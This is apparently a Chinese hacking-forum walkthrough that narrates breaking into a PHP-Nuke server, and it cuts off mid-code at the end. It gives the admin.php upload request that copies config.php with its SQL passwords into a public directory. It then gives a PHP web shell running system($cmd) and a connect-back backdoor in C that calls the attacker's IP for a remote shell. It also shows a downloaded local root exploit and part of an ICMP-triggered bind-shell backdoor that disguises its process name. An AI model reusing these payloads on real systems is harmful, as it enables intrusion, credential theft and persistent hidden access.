学习利用phpnuke的漏洞做坏事
哎放假了,想想我晃了半辈子还没入侵过unix呢?在焦点看到了《san是怎么
利用phpnuke的漏洞做坏事的》
这篇好好文章,我看我要学习学习。
我在google上搜了搜admin.php(多找找吧,这用的时间会很长)。哈~~看见
一个cshu.51.net/admin.php?
(这是假的了谁会用自己的巢干活啊-西~~~)在上面就上admin登陆界面,在ie上copy:csh
u.51.net/admin.php?upload=1&
file=config.php&file_name=cshu.txt&wdir=/images/&userfile=config.php&userfile_na
me=cshu.txt
————用猫干活好慢啊!(乘这时解释一下上面的东东是what意思,就是
把phpnuke的配制文件copy到/ima
ges/cshu.txt下啦!)看见filemanager界面了吗?这是上传文件的界面。但是(最讨厌的事
出现了)有时在页面的顶部出现了
一些错误信息,这一般是/images/没写的权先,怎摸办?那就找有权先的目录,在wdir=这改
改比如:wdir=/images/xxxxx/dd
dd或wdir=/../xxx/,还有../../../../看到你nobody权先能看到的所有目录。找到的目录一
定能用ie访问到哦,我找这样的目
录花了我1.8元(一个小时),成功后能在这个目录下看到一个cshu.txt的文件,打开看看c
shu.51.net/xxx/images/cshu.txt
片断
$AllowableHTML = array("p"=>2, "b"=>1, "i"=>1, "a"=>2, "em"=>1, "br"=>1,
"strong"=>1, "blockquote"=>1, "tt"=>1, "li"=>1, "ol"=>1, "ul"=>1);
######################################################################
(1=Yes 0=No This will display a new box in Statistics page with relevant server
info)
$Ephemerids = 0; $advancedstats = 0;
当然包括sql密码等敏感信息。但我不会用(你信吗?)。然后~~~上传文件phpshell.ph
p或
cmd.cgi只要server上支持我上传了cmd.php
------------test1.php------------
echo"
";
system("$cmd");
echo"
";
?>
------------test1.php----------
学san的。
输入cshu.51.net/xxx/images/cmd.php?cmd=id
看到了吧
uid=60001(nobody) gid=60001(nobody)
这样也可以看到passwd但现在谁想去cracker啊
上传个bindshell吧
/*
**
** Digit-Labs Connect-Back Backdoor - digit-labs.org
**
**
** Use this backdoor to access machines behind
** firewalls.
**
** [step 1] -
** setup a listening port on your box e.g:
** >nc -l -p 4000
**
** [step 2] -
** Issue the following command:
** >./cbd
**
*/
int fd, sock;
int port = 4000;<---可改改
struct sockaddr_in addr;
char mesg[]= "\n[ Digit-Labs Connect-Back Backdoor ]\n \
* Connected to Commandline...\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc < 2) {
fprintf(stderr, "\n %s
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "httpd.", 0); "httpd."<---可改改,免得别人发现就不好
close(fd);
return 1;
}
不错吧!还可以绕过方火墙。
上传——————backdoor.c
在俺机上开个窗
c:\nc -l -vv -p 4000 \n
cshu.51.net/xxx/images/cmd.php?cmd=cc -o back backdoor.c
cshu.51.net/xxx/images/cmd.php?cmd=./back xxx.xxx.xx.xx(我的ip)
在看俺的窗
c:\nc -l -vv -p 4000
listening on [any] 4000 ...
connect to [*.*.*.*] from www.server.net [*.*.*.*] 2259
[ Digit-Labs Connect-Back Backdoor ]
* Connected to Commandline...
ls <-----熟悉了吧
别忘了还是nobody呢!!!
w
USER TTYFROMLOGIN@ IDLE JCPU PCPUWHAT
没人!(兴奋)开始了~~~
uname -a
Linux grasshopper.tellus.nl 2.2.17-21mdksecure #1 SMP Thu Oct 5 12:52:38 CEST
2000
i686 unknown
cd /usr/include/i586-mandrake-2.2.17/
哦是mandrakelinux
到e4gle.org那去找个local溢出的程试http://e4gle.org/exploit/os/linux/mandrake/7.2/epcs2.c
上传---------epcs2.c
cc -o x epcs2.c
./x
bug exploited successfully.
nenjoy
cd /root
ls
README_FIRST
admin
装个后门就lion写的那个吧
,have a goodluck.:) \r\n====================================\r\n\r\nyour comman
d: \0"
void child_kill();
int bind_shell();
int main(int argc, char *argv[])
{
int s, size, fromlen;
char pkt[4096];
struct protoent *proto;
struct sockaddr_in from;
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD, child_kill);
if (fork() != 0) exit(0);
proto = getprotobyname("icmp");
/* can't creat raw socket */
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
exit(0);
/* waiting for packets */
while(1)
{
strcpy (argv[0], HIDEME);
do
{
fromlen = sizeof(from);
if ((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *) &from, &fr
omlen)) < 0)
printf("", size-28);
} while (size != SIZEPACK + 28);
/* size == SIZEPACK, let's bind the shell on your port :)*/
switch(fork())
{
case -1:
continue;
case 0:
strcpy (argv[0], HIDEIDS);
bind_shell();
exit(0);
}
sleep(100);
}
}
void child_kill()
{
wait(NULL);
signal(SIGCHLD, child_kill);
}
int bind_shell()
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1)
推荐文章 |